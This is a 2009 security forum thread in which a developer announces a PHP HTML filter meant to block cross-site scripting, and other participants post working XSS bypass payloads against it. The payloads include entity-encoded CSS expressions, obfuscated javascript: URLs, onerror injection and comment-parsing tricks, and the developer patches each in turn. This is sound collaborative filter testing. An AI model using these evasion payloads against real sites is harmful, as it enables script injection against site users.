Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Released new secure HTML parser and filter
Posted by: mlemos
Date: August 19, 2009 05:21AM

Hello,

I finally released my secure HTML parser and filter.

It is a bunch of PHP classes that aim to parse and filter insecure HTML mainly to avoid XSS attacks. Below follows a more detailed definition.

The goal of this package is not to compete with existing packages for similar purposes, but rather to address needs that I had and could not be fulfilled by existing solutions.

I am announcing it here because mainly to get feedback, in particular about eventual flaws and XSS attack vectors that the current implementation does not handle properly.

Thank you in advance for your time and patience in evaluating this package.

Manuel Lemos


The package can be downloaded from here:

http://www.phpclasses.org/secure-html-filter

Or pulled from a CVS repository using a command line like this:

cvs -z3 -d :pserver:cvsread@cvs.meta-language.net:/opt2/ena/metal checkout markupparser xmlparser

The validator class caches parsed DTD in local files to avoid DTD file fetching and parsing overhead. It needs a file caching class that currently is only available from here:

http://www.phpclasses.org/filecache

This package can be used to parse and filter insecure HTML tags and CSS styles.

It comes with a general purpose markup parser class that can parse any type of markup documents like HTML, XML and DTD files.

There are several other classes that can be chained together to retrieve the document token elements returned by the main markup parser class and filter the document elements in an useful way.

The markup validator filter class validates a document against a DTD, eventually removing invalid tags and attributes.

The safe HTML filter class uses several white lists to process HTML tags and data returned by the markup validator class and discards potentially harmful HTML tags and CSS that could be used to perform cross-site scripting (XSS) or cross-site request forgery (CSRF) security attacks.

The filtered HTML tokens can be reassembled to return a well-formed and secure HTML document.

The HTML links filter class can extract the links contained in an HTML document.

The DTD parser and CSS parser are utility classes used by the other classes.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: Gareth Heyes
Date: August 19, 2009 06:11AM

Demo or no dice

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: PaPPy
Date: August 19, 2009 08:52AM

requires 2 other classes which arent included?

also only tests from
http://www.phpclasses.org/browse/file/28173.html
Definitions for the XSS attack vectors from ha.ckers.org

even tho this deals with XSS, shouldnt it be under projects
http://sla.ckers.org/forum/list.php?12

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: thrill
Date: August 19, 2009 09:13AM

Correct PaPPy, moved.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 19, 2009 01:50PM

Garrett, the package comes with a test script named test_safe_html_filter.php that you can use to try it.

The two classes that are not inside the package, are not really required, but as I mentioned they may be obtained here:

http://www.phpclasses.org/filecache (This is for caching DTD, although caching is optional)

and

cvs -z3 -d :pserver:cvsread@cvs.meta-language.net:/opt2/ena/metal checkout xmlparser

or

http://www.phpclasses.org/xmlparser (This is only needed for parsing the xssAttacks.xml file)

Just let me know if you have further difficulties to test this package.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: Gareth Heyes
Date: August 19, 2009 02:05PM

So you want me to get an account on phpclasses, then download two classes and install them on a local machine after examining each one for backdoors then find the many holes and post them here?

Jeez I don't fancy your chances :P

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 20, 2009 05:31AM

Gareth, relax, it would be silly for me to distribute PHP source code with backdoors, especially when it is easy for anybody to read the source.

Anybody that knows me is aware that I am a trustworthy person and I would never do anything like that. But it's OK, I suppose you do not know me and you are not willing to take chances.

Anyway, I just added a page with a form on which you can try any HTML code you want against this package:

http://www.meta-language.net/markupparser/secure_html_filter.html

Keep in mind that this is still a project in beta stage and there are known limitations that will be addressed so.

For now, I would just appreciate any feedback regarding any XSS attacks that the package is not yet handling properly.

Thanks in advance for your time and patience.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: Gareth Heyes
Date: August 20, 2009 06:10AM

@mlemos

Sorry mate I've been in a bad mood lately, but still I wouldn't trust code from someone without testing it first :P Anyway...bypassed.

<div style=color:&#92&#48&#48&#54&#53&#92&#48&#48&#55&#56&#92&#48&#48&#55&#48&#92&#48&#48&#55&#50&#92&#48&#48&#54&#53&#92&#48&#48&#55&#51&#92&#48&#48&#55&#51&#92&#48&#48&#54&#57&#92&#48&#48&#54&#102&#92&#48&#48&#54&#101&#92&#48&#48&#50&#56&#92&#48&#48&#54&#49&#92&#48&#48&#54&#99&#92&#48&#48&#54&#53&#92&#48&#48&#55&#50&#92&#48&#48&#55&#52&#92&#48&#48&#50&#56&#92&#48&#48&#51&#49&#92&#48&#48&#50&#57&#92&#48&#48&#50&#57></div>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: Anonymous User
Date: August 20, 2009 06:19AM

<a href="javas\0cript:alert(1)">x</a>

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: Anonymous User
Date: August 20, 2009 06:21AM

<a href="j&#x61vascript:prompt(2)">xxx</a>
<a href="&#x09javascript:prompt(2)">xxx</a>
<a href="j&#x00avascript:prompt(2)">xxx</a> //chrome and IE

Tons of variants for this one



Edited 1 time(s). Last edit at 08/20/2009 06:26AM by .mario.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: rvdh
Date: August 20, 2009 06:25AM

I got an account on phpclasses for a very long time, very cool site and very nice people. Come to think about it, me and Manuel had a few chats long time ago. Didn't know it was you Manuel!

Hehe funny.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: sirdarckcat
Date: August 21, 2009 01:30AM

@mario, @gareth

Those are false positives, it CANT be so easy to bypass, it says "secure" in the name.

compatibility = super bad
parser security = super bad

you need to read HTML 2, 4, 5 and CSS 1,2,3 specs, also Unicode of course and do a lot of testing on IE 5,6,7,8 and Firefox 1.5,2,2.5,3,3.5,3.6 and Opera 7,8,9,10 in all their versions (mini, embed, mobile, pc, etc..) Safari/Chrome (webkit mostly all versions) and also have like 2-3 years of experience on internet browser's quirks and problems before even attempting to make a parser with a "secure" in it's name.

My third try to break it, broke it (not to say all the issues you have with compatibility).

<img src=//256"onerror="alert(1)>

nice try..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: thornmaker
Date: August 21, 2009 01:51AM

<img src="http:x" alt='"x=' name=onerror='alert(0)'></img>

IIRC, this will execute in FF2.X: <!--x--x><script>alert(0)</script>-->



Edited 1 time(s). Last edit at 08/21/2009 02:14AM by thornmaker.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 21, 2009 02:28AM

Gareth, no problem.

Meanwhile I tackled that case. You may want to try again now.

I think I still need to deal with CSS comments, as they seem to be allowed in the middle of style values.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: thornmaker
Date: August 21, 2009 02:31AM

this definitely works in the latest firefox and bypasses the filter: <!--x--!><script>alert(0)</script>-->

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: Anonymous User
Date: August 21, 2009 04:17AM

<!--><img/src='-->' onerror=alert(1)//

This works in FF3+ (didn't test 2.x) - don't worry - other well known HTML filter are being fooled by this one too :)

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: sirdarckcat
Date: August 21, 2009 04:57AM

@mario and conditional comments rock even more

btw did u knew that ---> is not a valid close-comment on xml? (if it has 3 dashes its invalid)


--edit--
omg, I just tested the <!--> on ff+ my html parser and it works (was filtered correctly on IE {that works on IE too}, but I thought ffx parsed it correctly by the html engine.. I'll be patching this issue on core, just in case any other browsers allow it).

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 08/21/2009 04:59AM by sirdarckcat.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: Anonymous User
Date: August 21, 2009 05:45AM

@sdc: Nup didn't know but very interesting! What I do know is that FF is attackers best friend :)

<!--><iframe/a='-->'onload=alert(1)//

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 21, 2009 05:18PM

mario, I nailed those vectors with encoded entities in the middle of javascript URLs.

BTW, when you put the vector <a href="javas\0cript:alert(1)">x</a> do you mean that \0 is the NUL character of a slash character \ followed by the character zero 0 ? I only nailed the first case.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: Anonymous User
Date: August 21, 2009 06:57PM

@mlemos I meant nullbytes in general (Chrome, IE8 etc..)

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 22, 2009 03:20AM

rvdh, a lot of people went to the PHPClasses site, if not to use stuff available there, at least to research existing solutions for their purposes.

I just would not guess who are you because your alias rvdh does not ring any bells to me. Maybe if you tell me your real name, I may remember! ;-)

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 22, 2009 03:25AM

thornmaker, I just nailed that end comment variant and updated the test site.

Anyway, it is a bit odd. The HTML documentation says SGML comments may end with -- followed possibly by whitespace before the > . So maybe I should also consider that possibility.

However, adding whitespace between -- and > does not make at least Firefox treat it as end comment, but using a ! does it. Is this something defined in any standard or a Firefox quirk? Did you find this out by yourself or you read somewhere?

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 22, 2009 05:57AM

Ok, I think I nailed all the vectors presented so far. Please check them again in the test page and let me know of any other vectors you find out it failed.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: Anonymous User
Date: August 22, 2009 12:45PM

<!--><img src="x->" onerror=alert(1)//<!-->-->

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 22, 2009 03:41PM

mario, that vector was already handled. If you try it, you may see that the class closes the img tag and the onerror attribute becomes data.

At most what I can do better with that case is to encode the " character that was moved to data, but that is harmless.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: thornmaker
Date: August 22, 2009 05:37PM

mlemos Wrote:
-------------------------------------------------------
> thornmaker, I just nailed that end comment variant
> and updated the test site.
>
> Anyway, it is a bit odd. The HTML documentation
> says SGML comments may end with -- followed
> possibly by whitespace before the > . So maybe I
> should also consider that possibility.
>
> However, adding whitespace between -- and > does
> not make at least Firefox treat it as end comment,
> but using a ! does it. Is this something defined
> in any standard or a Firefox quirk? Did you find
> this out by yourself or you read somewhere?


If I recall correctly, while reading about HTML5 I saw something about --!> being allowed to close comments (I can't find any references to this now though). I had not tried this specific one until couple of nights ago. At least some versions of Firefox 2.X allowed arbitrary text between the -- and the > in order to close a html comment (not just a single char or white space). See http://sla.ckers.org/forum/read.php?3,12323#msg-12344 for a discussion on this. I don't have any firefox 2.X to test with right now though.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 23, 2009 04:03AM

thornmaker, you are right. I think is safer to consider that a comment ends after the -- and > characters even if there are any characters in between. I just nailed that vector now.

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: sirdarckcat
Date: August 24, 2009 09:35AM

<h1 style="color:url(&#x27;&#x22;javascript:alert(/good luck next time/)&#x22;&#x27;);"></h1>

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 27, 2009 01:09PM

sirdarckcat, unsafe URL checking was just fixed to properly determine URL schemes before checking against the white list.

Options: ReplyQuote


Sorry, only registered users may post in this forum.